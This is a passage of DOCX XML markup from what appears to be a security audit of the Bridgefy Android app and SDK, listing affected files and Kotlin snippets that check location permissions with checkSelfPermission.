        </w:rPr>
        <w:t>GPS_PROVIDER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) || </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lm.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>isProviderEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(LocationManager.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NETWORK_PROVIDER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="5012" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(ex:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Exception)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ex.printStackTrace() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>checkSelfPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-android/bridgefy-transport/bluetooth-low-energy/src/main/java/me/bridgefy/t ransport/core/BluetoothCentralManager.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>checkSelfPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(Manifest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.permission.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ACCESS_COARSE_LOCATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>!= PackageManager.PERMISSION_GRANTED) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="2303" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Logger.e(TAG,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ACCESS_COARSE_LOCATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>permission,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scan"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/kotlin/me/bridgefy/main/ux/login/LoginActivity.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="1511" w:right="2367" w:hanging="792"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>checkLocationPermissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fineLocation =</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="1187"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ContextCompat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>checkSelfPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context, Manifest.permission.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ACCESS_FINE_LOCATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>coarseLocation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="1187"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ContextCompat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>checkSelfPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context, Manifest.permission.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ACCESS_COARSE_LOCATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="791"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fineLocation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PackageManager.PERMISSION_GRANTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
